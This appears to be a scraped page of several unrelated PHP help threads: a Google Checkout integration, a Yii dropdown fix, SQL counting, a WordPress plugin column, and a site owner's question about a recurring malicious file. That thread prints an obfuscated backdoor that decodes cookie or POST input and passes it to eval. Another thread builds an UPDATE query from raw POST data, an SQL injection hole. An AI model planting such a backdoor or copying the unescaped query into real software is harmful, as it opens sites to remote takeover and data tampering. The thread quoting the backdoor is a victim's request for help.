google checkout php callback explained - php

Hi all i don't know if i'm doing this right or not but i can't understand how google checkout works.
I have the php code that sends the XML to the google checkout everything is ok i reach on the checkout process taxes prices shipping is ok.
$_currency = $params['currency'];
$base_domain = 'https://' . (($params['mode'] == 'transaction') ? 'checkout.google.com' : 'sandbox.google.com/checkout');
$base_url = $base_domain . '/cws/v2/Merchant/' . $params['merchantId'] . '/checkout';
// Form XML array with cart items
$_items = '';
$google_products = $this->CI->go_cart->contents();
foreach ($google_products as $k => $v) {
$item_options = '';
if (isset($v['options'])) {
foreach ($v['options'] as $name => $value) {
if (is_array($value)) {
foreach ($value as $item) {
$item_options .= $item;
}
} else {
$item_options .= $value;
}
}
}
$_items .= '<item>' . '<merchant-item-id>' . $v['id'] . '</merchant-item-id>' . '<item-name>' . strip_tags($v['name']) . ' ' . $item_options . '</item-name>' . '<item-description>' . substr(strip_tags($item_options), 0, 299) . '</item-description>' . "<unit-price currency='" . $_currency . "'>" . $v['price'] . '</unit-price>' . '<quantity>' . $v['quantity'] . '</quantity>' . '</item>';
}
$xml_cart = "<?xml version='1.0' encoding='UTF-8'?>
<checkout-shopping-cart xmlns='http://checkout.google.com/schema/2'>
<shopping-cart>
<merchant-private-data>
<additional_data>
<session_id>" . base64_encode($customer['bill_address']["email"] . date('h:i:s')) . "</session_id>
<currency_code>" . $_currency . "</currency_code>
<payment_id>" . base64_encode($customer['bill_address']["email"] . date('h:i:s')) . "</payment_id>
" . $private_ship_data . "
</additional_data>
</merchant-private-data>
<items>" . $_items . "</items>
</shopping-cart>
<checkout-flow-support>
<merchant-checkout-flow-support>
<platform-id>971865505315434</platform-id>
<request-buyer-phone-number>true</request-buyer-phone-number>
<edit-cart-url>" . $edit_cart_url . "</edit-cart-url>
<merchant-calculations>
<merchant-calculations-url>" . $calculation_url . "</merchant-calculations-url>
</merchant-calculations>
<continue-shopping-url>" . $return_url . "</continue-shopping-url>
" . $shippings . $taxes . "
</merchant-checkout-flow-support>
</checkout-flow-support>
</checkout-shopping-cart>";
$signature = $this->fn_calc_hmac_sha1($xml_cart, $params['merchantKey']);
$b64_cart = base64_encode($xml_cart);
$b64_signature = base64_encode($signature);
echo '<form method="post" action="' . $base_url . '" name="BB_BuyButtonForm">
<input type="hidden" name="cart" value="' . $b64_cart . '" />
<input type="hidden" name="signature" value="' . $b64_signature . '" />
<input alt="" src="' . $base_domain . '/buttons/checkout.gif?merchant_id=' . $params['merchantId'] . '&w=160&h=43&style=' . 'white' . '&variant=text&loc=en_US" type="image"/>
</form>';
exit;
}
After i click on submit payment i'm then redirected to a page with successfull message and with a link to return to my website.
I'm wondering how can i check if the payment was or not successfully.
Also there is a callback that i don't know exactly what is supposed to do.
Please help me understand better
I have attached the code below.


Disclaimer: Am not a PHP dev.
Your code above is known as Part 1. Checkout API documented here. It covers how you get your data/cart to Google for Checkout
Part II. Order Processing covers how to get data from Google (into your systems). A tutorial is provided here. This is where you provide a Callback API URL that listens to (waits for) HTTP POSTs from Google and proceed to process the data.

Related

Changing radiolist to dropdown

I have stuck ;/ I have activeradiolist and works ok, but I need to create another list bud with dropdowns item's
my code with $model for activeradioList
echo Html::activeradioList($add, 'type_contact',
$items, ['item' => function ($index, $label, $name, $checked, $value) {
$return = '<div style="max-height:178px!important;" class="radio col-xs-12 col-lg-6"><input type="radio" name="' . $name . '" value="' . $value . '" tabindex="3" id="' . $name . $index . '" ' . ($checked ? 'checked' : '') . '>';
$return .= '<label style="padding-top:0!important" for="' . $name . $index . '">' . $label . '</label></div>';
if ($checked && $index === 1) {
$return .= '<script>$(document).ready(function(){$(\'#ref-form\').slideDown()});</script>';
}
return $return;
}]
); ?>
Now i try to convert this to dropdownList like ->
echo CHtml::dropDownList($add, 'type_contact',
$items, ['item' => function ($index, $label, $name, $checked, $value) {
$return = '<div style="max-height:178px!important;" class="radio col-xs-12 col-lg-6"><input type="radio" name="' . $name . '" value="' . $value . '" tabindex="3" id="' . $name . $index . '" ' . ($checked ? 'checked' : '') . '>';
$return .= '<label style="padding-top:0!important" for="' . $name . $index . '">' . $label . '</label></div>';
if ($checked && $index === 1) {
$return .= '<script>$(document).ready(function(){$(\'#ref-form\').slideDown()});</script>';
}
return $return;
}]
); ?>
and have htmlspecialchars() expects parameter 1 to be string, object given

1) The CHtml is class from old Yii 1.x framework. Yii2 doesn't use the C prefix for its class names.
2) You are pairing the form field with your model instance so you should use the activeDropDownList() method instead of dropDownList().
3) In your radio button options you have item callback that is used to generate the html code for radio button. The drop down list doesn't have anything like that so you should remove it from its options. You can completly omit the fourth parameter because the item callback is the only option there.
So the code for drop down list should look like this:
echo Html::activeDropDownList($add, 'type_contact', $items);

PHP file injection.. how to solve this?

there is always a file on my website that always being upload even though im not the one who upload it.
This is the file
and this is the code when you open it.. any idea how to stop this?
<?php
1.$ilmtik[4] . $ilmtik[26] . $ilmtik[20] . $ilmtik[18] . $ilmtik[12] . $ilmtik[3] . $ilmtik[22] . $ilmtik1 . $ilmtik[5] . $ilmtik[14] . $ilmtik[28] . $ilmtik[5] . $ilmtik[30] . $ilmtik[30] . $ilmtik[4] . $ilmtik[26];
$kkunht[] = $ilmtik[24] . $ilmtik[13];
$kkunht[] = $ilmtik[0];
$kkunht[] = $ilmtik[26] . $ilmtik[17] . $ilmtik[27] . $ilmtik[21] . $ilmtik[32];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[23] . $ilmtik[16] . $ilmtik[3] . $ilmtik[2] . $ilmtik[3] . $ilmtik[6] . $ilmtik[32];
$kkunht[] = $ilmtik[3] . $ilmtik[29] . $ilmtik[2] . $ilmtik[8] . $ilmtik[17] . $ilmtik[12] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[27] . $ilmtik[22] . $ilmtik[10] . $ilmtik[32] . $ilmtik[16];
$kkunht[] = $ilmtik[6] . $ilmtik[16] . $ilmtik[16] . $ilmtik[6] . $ilmtik[25] . $ilmtik[23] . $ilmtik[34] . $ilmtik[3] . $ilmtik[16] . $ilmtik[33] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[8] . $ilmtik[3] . $ilmtik[21];
$kkunht[] = $ilmtik[2] . $ilmtik[6] . $ilmtik[26] . $ilmtik[15];
foreach($kkunht[7]($_COOKIE, $_POST) as $dfmafta => $ozyods) {
function lawlvc($kkunht, $dfmafta, $fanykfj)
{
return $kkunht[6]($kkunht[4]($dfmafta . $kkunht[0], ($fanykfj / $kkunht8) + 1) , 0, $fanykfj);
}
function cuoen($kkunht, $soeasy)
{
return #$kkunht[9]($kkunht1, $soeasy);
}
function mktryk($kkunht, $soeasy)
{
$pcrtw = $kkunht3 % 3;
if (!$pcrtw) {
eval($soeasy1);
exit();
}
}
$ozyods = cuoen($kkunht, $ozyods);
mktryk($kkunht, $kkunht[5]($kkunht[2], $ozyods ^ lawlvc($kkunht, $dfmafta, $kkunht8)));
}
could someone has an idea on this.. thank you :(

there are numerous scanners that will check your site (for example, https://sitecheck.sucuri.net/).
to fix the problem, i would disable php, turn off http access, then ssh into the site and start cleaning up the malware. changing your password isn't a bad idea, but it won't have much impact on a backdoor.

Listing number of rows by group

I have a database with members joining and I am trying to display the number of members from each country.
Here is the code I'm using to show the country flags:
<?
foreach( $sorters as $sortvalue )
if( $sortvalue == '' )
echo '<li> <a href="' . $list_url . $connector . $sortfield .
'=none">None given</a> </li>';
else
echo '<a href="' . $list_url . $connector . $sortfield .
'=' . $sortvalue . '"><img src="' . $flags . str_replace(' ', '_', $sortvalue) . '.gif" title="' . $sortvalue . '" alt="' . $sortvalue . '"></a> ' . $countrynum . ' fans<br>';
}
?>
I have really looked for the answer, and keep seeing the same type of code, but I haven't been able to get it to work for me.
I've tried this:
$countrynum = SELECT COUNT(name) FROM $table WHERE country = $sortvalue;
which I inserted after the foreach statement. This (and every other iteration of this I've tried gives me Parse error: syntax error, unexpected 'COUNT' (T_STRING) in...
The closest I've come to solving this is by using this code (though, I shouldn't have to reconnect to the db should i?):
<?
foreach( $sorters as $sortvalue )
if( $sortvalue == '' )
echo '<li> <a href="' . $list_url . $connector . $sortfield .
'=none">None given</a> </li>';
else
$dbh = new PDO("mysql:host=$hostname;dbname=$db", $username, $password);
foreach($dbh->query('SELECT country, COUNT(*) FROM $table GROUP BY country') as $row) {
echo '<a href="' . $list_url . $connector . $sortfield .
'=' . $sortvalue . '"><img src="' . $flags . str_replace(' ', '_', $sortvalue) . '.gif" title="' . $sortvalue . '" alt="' . $sortvalue . '"></a> ' . $row['COUNT(*)'] . ' fans<br>';
}
?>
This gave me the correct row (member) count, but the same single flag was displayed beside each number instead of the corresponding flag with number of members.
I'm sure this is probably super simple for lots of you, but I'm a newbie who's really trying to learn coding and so far that mostly means cutting, pasting and LOTS of trial and error.
Any assistance (and learning resource suggestions) would be very much appreciated. :)

Since the flag image source is depending on$sorters and $sortvalue, it will be same for all country. Look at the loops. For each $sorters as $sortvalue, the link will be multiple countries but the img source will be same for all.

UPDATE not working with arrays

I am trying to get the info stored in the array updated to the database. I cannot seem to get it to work. Any help will be appreciated. Thanks.
In the Config Class:
function update_cfg(array $upd)
{
if(is_array($upd))
{
$sql = array();
foreach($upd as $column => $info)
{
if(isset($info) && $column != 'update_cfg')
{
$sql[] = "`" . $column . "`='" . $info . "'";
}
}
if(is_array($sql))
{
$result = $this->Sys->db->query("UPDATE `dj_settings` SET " . implode(', ', $sql));
if($result)
{
unset($sql);
return TRUE;
}
else
{
unset($sql);
return FALSE;
}
}
}
}
Script:
<?php
global $Sys;
if(isset($_POST['update_cfg']))
{
unset($_POST['update_cfg']);
$update = $_POST;
unset($_POST);
if($Sys->Config->update_cfg($update))
{
$Sys->Template->setAlerts('The website has been successfully updated!');
}
else
{
$Sys->Template->setAlerts('The website has not been updated.', 'error');
}
unset($update);
}
?>
<div id="webCfg">
<h2>Website Configuration</h2>
<?php
global $Sys;
global $handle;
$alerts = $Sys->Template->getAlerts();
if ($alerts != '') { echo '<div><ul class="alerts">' . $alerts . '</ul></div>'; }
asort($handle);
if($handle['status'] == 1)
{
$enable = 'checked="checked"';
}
else
{
$disable = 'checked="checked"';
}
foreach ($handle as $key => $val)
{
$label = str_replace('_', ' ', $key);
if(strlen($val) <= 50 && !is_numeric($val))
{
$input[$key] = '<tr><td class="label"><label for="' . $key . '">' . ucwords($label) . '</label></td><td class="content"><input type="text" id="' . $key . '" name="' . $key . '" value="' . $val . '"/></td></tr>';
}
elseif(strlen($val) >= 51 && !is_numeric($val))
{
$input[$key] = '<tr><td class="label"><label for="' . $key . '">' . ucwords($label) . '</label></td><td class="content"><textarea id="' . $key . '" name="' . $key . '">' . ucfirst($val) . '</textarea></td></tr>';
}
elseif(is_numeric($val))
{
$input[$key] = '<tr><td class="label"><label for="' . $key . '">Website Status</label></td><td class="content"><input type="radio" id="' . $key . '" name="' . $key . '" value="1" ' . $enable . '> Enable <input type="radio" id="' . $key . '" name="' . $key . '" value="0" ' . $disable . '> Disable </td></tr>';
}
}
?>
<form action="" method="post">
<table cellpadding="1" cellspacing="0" id="webCfgTbl">
<?php
foreach (array_keys($input) as $key)
{
echo '<div class="row">' . $input[$key] . '</div>';
}
?>
<tr><td class="label"><label for="submit"></label></td><td class="content"><div class="row submitrow"><input type="submit" id="submit" name="update_cfg" class="submit" value="Update Settings" /></div></td></tr>
</table>
</form>
</div>
?>
The info from the database is loaded when the page is. When I change the values and click Update Settings, $Sys->Config->update_cfg() returns FALSE everytime. I am stumped on this and would appreciate any help. Thanks.
EDIT
When I echo the query in the update_cfg() function after the foreach() loop I get this:
UPDATE `dj_settings` SET `status`='0', `disabled_msg`=':: Test Message for Disabled Website ::', `email_auto_response`='Thank you so much for your email. I will respond back as soon as I am able. Usually within 30 minutes. Please feel free to look at the pictures and videos on our website, and the FAQ and Pricing tab is a great resource also. I will respond personally to any questions you may have shortly. Have a great day! Some tips on picking the right DJ: For most hiring a DJ is a first time experience. Picking the right DJ can be daunting and sometimes overwhelming task. Here are some good tips to follow to help you through your process. 1. Make sure they have their LLC or INC, and have a business license for your area. 2. Make sure they are insured. 3. Make sure that you sign some kind of a contract throughout the booking process. 4. Check reviews on reputable websites. ie.. thumbtack.com , weddingwire.com, or yellowpages.com. 5. If the price is too good to be true, it is. This is a big one, because you definitely get what you pay for when you hire a DJ. 6. Sit down with a couple of DJ's and talk them, generally your own intuition will get you far. If you follow those steps, you're sure to get a good DJ. No matter who it is, with my company or with a competitor. Your event will go off smoothly 99% of the time. Marshall Bracewell-Owner Dynamic DJ Company, LLC 803-807-1243 http://www.dynamicdjcompany.com', `web_url`='http://www.dynamicdjcompany.com', `web_email`='marshall#dynamicdjcompany.com'

Well...that's a start I guess...at least the update is working. Try first doing $info = $this->Sys->db->real_escape_string($info); then putting that into the "" . $column . "='" . $info . "'";

How would I add another column and populate it?

I know this is way out of left field, but i was wanting to see if anyone could help.
I am wanting to add a column, populating the data from a certain variable (the variable i have yet to discover the name of). This is a plugin for wordpress and the developer wont really help.
Last ditch effort i guess. Here is the code:
}$output.='><tr><th>' . __('Request For', 'wpsc-support-tickets') . '</th><th>'
. __('Status', 'wpsc-support-tickets') . '</th><th>'
. __('Last Reply', 'wpsc-support-tickets')
. '</th><th>' . __('Department', 'wpsc-support-tickets') . '</th></tr>';
I added the last column, "Department".
Now, looking at the following code, i cant figure out how to populate that data (assuming i knew the variable even)
$output .= '<tr><td>
<a href="" onclick="loadTicket(' . $result['primkey'] . ',\'' . $canReopen . '\');
return false;" ';
if ($result['resolution'] == strtolower('open') ) {
$resresolution = __('Open', 'wpsc-support-tickets');
} elseif ($result['resolution'] == strtolower('closed') ) {
$resresolution = __('Closed', 'wpsc-support-tickets');
} else {
$resresolution = $result['resolution'];
}
if ($devOptions['disable_inline_styles'] == 'false') {
$output.='style="border:none;text-decoration:none;"';
}$output.='><img';
if ($devOptions['disable_inline_styles'] == 'false') {
$output.=' style="float:left;border:none;margin-right:5px;"';
}$output.=' src="' . plugins_url('/images/page_edit.png', __FILE__) . '"
alt="' . __('View', 'wpsc-support-tickets') . '" /> ' . base64_decode($result['title']) .
'</a></td><td>' . $resresolution . '</td><td>'
. date_i18n( get_option( 'date_format' ),
$result['last_updated']) . ' ' . __('by', 'wpsc-support-tickets') . '
' . $last_staff_reply . '</td>
</tr>';
again - where might i add the variable for the column "department" if the variable were $department_var?

You can add it to the very end of that large chunk of mess before the closing </tr>...
change
...$last_staff_reply . '</td></tr>';
to
...$last_staff_reply . '</td><td>' . $department_var . '</td></tr>';

Categories